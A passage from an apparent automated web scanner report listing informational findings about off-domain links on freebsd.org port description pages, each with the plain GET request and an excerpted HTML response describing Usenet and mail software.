WWW: <A HREF="http://ifmail.sourceforge.net/">http://ifmail.sourceforge.net/</A>
...[SNIP]...

20.641. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/cg/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.nih.at/cg/

Request

GET /cgi/url.cgi?ports/news/cg/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
A semi-automatic newsgroup binary downloader. It assembles parts based
on subject headers and then offers them in an editor for the user to
choose which files he really wants.

WWW: <A HREF="http://www.nih.at/cg/">http://www.nih.at/cg/</A>
...[SNIP]...

20.642. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newscache/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.linuxhacker.at/newscache/

Request

GET /cgi/url.cgi?ports/news/newscache/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
is sent directly to its client. Otherwise,
the article is requested from the upstream news server, stored in the
cache area and sent back to the client.

Author: Thomas Gschwind, Herber Straub
WWW: <A HREF="http://www.linuxhacker.at/newscache/">http://www.linuxhacker.at/newscache/</A>
...[SNIP]...

20.643. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/german/unix-connect/pkg-descr

The response contains the following links to other domains:

http://sourceforge.net/projects/unix-connect/
http://www.dinoex.de/unix-connect.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/german/unix-connect/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
</A>
WWW: <A HREF="http://www.dinoex.de/unix-connect.html">http://www.dinoex.de/unix-connect.html</A>
WWW: <A HREF="http://sourceforge.net/projects/unix-connect/">http://sourceforge.net/projects/unix-connect/</A>
...[SNIP]...

20.644. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-POE-Component-Server-NNTP/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/POE-Component-Server-NNTP/
http://www.faqs.org/rfcs/rfc977.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-POE-Component-Server-NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
POE::Component::Server::NNTP is a POE component that implements an RFC 977
<A HREF="http://www.faqs.org/rfcs/rfc977.html">http://www.faqs.org/rfcs/rfc977.html</A>
...[SNIP]...
se and process the commands given and send back applicable NNTP
responses.

This component doesn't implement the news database and as such is not by itself
a complete NNTP daemon implementation.

WWW: <A HREF="http://search.cpan.org/dist/POE-Component-Server-NNTP/">http://search.cpan.org/dist/POE-Component-Server-NNTP/</A>
...[SNIP]...

20.645. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/sabnzbdplus/pkg-descr

The response contains the following links to other domains:

http://sabnzbd.org/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/sabnzbdplus/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:31 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
loading
from Usenet easy by automating the whole thing. You give it an NZB
file or an RSS feed, it does the rest. Has a web-browser based UI
and an API for 3rd-party apps. Ideal for servers too.

WWW: <A HREF="http://sabnzbd.org/">http://sabnzbd.org/</A>
...[SNIP]...

20.646. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nn/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.nndev.org/

Request

GET /cgi/url.cgi?ports/news/nn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
No News is good news. This version of nn has NOV support.

WWW: <A HREF="http://www.nndev.org/">http://www.nndev.org/</A>
...[SNIP]...

20.647. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/py-twistedNews/pkg-descr

The response contains the following links to other domains:

http://twistedmatrix.com/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/py-twistedNews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
cts stored directly on
the filesystem for message storage. Twisted News also has very rudamentary
support for moderated groups.

Twisted News is available under the MIT Free Software licence.

WWW: <A HREF="http://twistedmatrix.com/">http://twistedmatrix.com/</A>
...[SNIP]...

20.648. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/s-news/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.lost.org.uk/snews.html

Request

GET /cgi/url.cgi?ports/news/s-news/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
how long they have been in the spool.
It has NNTP access configuration to allow and deny read, post and transfer
access to remote hosts.
It is very light weight and relatively easy to configure.

WWW: <A HREF="http://www.lost.org.uk/snews.html">http://www.lost.org.uk/snews.html</A>
...[SNIP]...

20.649. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/bgrab/pkg-descr

The response contains the following links to other domains:

http://bgrab.ifip.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/bgrab/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This is an automated binary extraction tool for UseNet newsgroups.
It will log into any newsgroup and download all the binary files.

WWW: <A HREF="http://bgrab.ifip.net/">http://bgrab.ifip.net/</A>
...[SNIP]...

20.650. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/mail/alpine/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.washington.edu/alpine/

Request

GET /cgi/url.cgi?ports/mail/alpine/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
n-line, context-sensitive help screens.

Alpine supports MIME (Multipurpose Internet Mail Extensions), an Internet
Standard for representing multipart and multimedia data in email.

LICENSE: ASL

WWW: <A HREF="http://www.washington.edu/alpine/">http://www.washington.edu/alpine/</A>
...[SNIP]...

20.651. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/pgpmoose/pkg-descr

The response contains the following links to other domains:

http://people.qualcomm.com/ggr/pgpmoose.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/pgpmoose/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
itten by Phil Zimmermann <prz@acm.org>, who
otherwise has nothing to do with this. The
cryptographic framework was written by Greg Rose
<ggr@usenix.org>, as were the INN news system hooks.

WWW: <A HREF="http://people.qualcomm.com/ggr/pgpmoose.html">http://people.qualcomm.com/ggr/pgpmoose.html</A>
...[SNIP]...

20.652. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newsfish/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.saddi.com/software/newsfish/

Request

GET /cgi/url.cgi?ports/news/newsfish/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
lying a set of regular
expressions (a la grep/egrep) to the headers of each article.

Articles are saved in mailbox format, which makes them suitable for
viewing under most popular mail readers.

WWW: <A HREF="http://www.saddi.com/software/newsfish/">http://www.saddi.com/software/newsfish/</A>
...[SNIP]...

20.653. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/newsgrab/pkg-descr

The response contains the following links to other domains:

http://newsgrab.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newsgrab/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Based on a given regular expression and news group, newsgrab will
connect to your NNTP server and download all the binaries in articles
that match the given regexp and uudecode them.

WWW: <A HREF="http://newsgrab.sourceforge.net/">http://newsgrab.sourceforge.net/</A>
...[SNIP]...

20.654. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/lusernet/pkg-descr

The response contains the following links to other domains:

http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/lusernet/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:58 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
LuserNET is an NNTP-based news reader for GNUstep.

LICENSE: GPL2

WWW: <A HREF="http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html">http://web.telia.com/~u42308495/alex/LuserNET/LuserNET.html</A>
...[SNIP]...

20.655. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/py-pynzb/pkg-descr

The response contains the following links to other domains:

http://pypi.python.org/pypi/pynzb/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/py-pynzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
rs.

Since NZB is XML-based, it's relatively easy to build one-off parsers
to parse NZB files. This project is an attempt to consolidate those
many one-off NZB parsers into one simple interface.

WWW: <A HREF="http://pypi.python.org/pypi/pynzb/">http://pypi.python.org/pypi/pynzb/</A>
...[SNIP]...

20.656. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/mail/claws-mail/pkg-descr

The response contains the following links to other domains:

http://www.claws-mail.org/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/mail/claws-mail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:20 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ernalization, and more.

In addition to the above, Claws Mail has a lot of extra features,
e.g. a plugin mechanism, a new filtering/processing mechanism,
extra folder properties and much more...

WWW: <A HREF="http://www.claws-mail.org/">http://www.claws-mail.org/</A>
...[SNIP]...

20.657. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/aub/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://yukidoke.org/~mako/projects/aub/

Request

GET /cgi/url.cgi?ports/news/aub/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ready, so that it does not waste time rebuilding the same binaries
over and over again.

run: ``aub -M | more'' for the long form documentation, or
``aub -m | more'' for the short form.

WWW: <A HREF="http://yukidoke.org/~mako/projects/aub/">http://yukidoke.org/~mako/projects/aub/</A>
...[SNIP]...

20.658. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/cleanfeed/pkg-descr

The response contains the following links to other domains:

http://www.exit109.com/~jeremy/news/cleanfeed.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cleanfeed/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ill continue releasing new versions until I get tired
or somebody else will step forward.

There is no real documentation, so if you never used cleanfeed please
download the original package from
WWW: <A HREF="http://www.exit109.com/~jeremy/news/cleanfeed.html">http://www.exit109.com/~jeremy/news/cleanfeed.html</A>
...[SNIP]...

20.659. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NNML/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/NNML/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NNML/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s a minimal NNTP server. It is (hope-)
fully conformant to rfc977. In addition the commands XOVER and
AUTHINFO are implemented.

Author: Ulrich Pfeifer <pfeifer@ls6.informatik.uni-dortmund.de>
WWW: <A HREF="http://search.cpan.org/dist/NNML/">http://search.cpan.org/dist/NNML/</A>
...[SNIP]...

20.660. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/mail/lmtp2nntp/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.ossp.org/pkg/tool/lmtp2nntp/

Request

GET /cgi/url.cgi?ports/mail/lmtp2nntp/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ovide a fully
reliable service. For this the program returns proper delivery status
notification which indi- cates successful completed action, persistent
transient failure or permanent failure.

WWW: <A HREF="http://www.ossp.org/pkg/tool/lmtp2nntp/">http://www.ossp.org/pkg/tool/lmtp2nntp/</A>
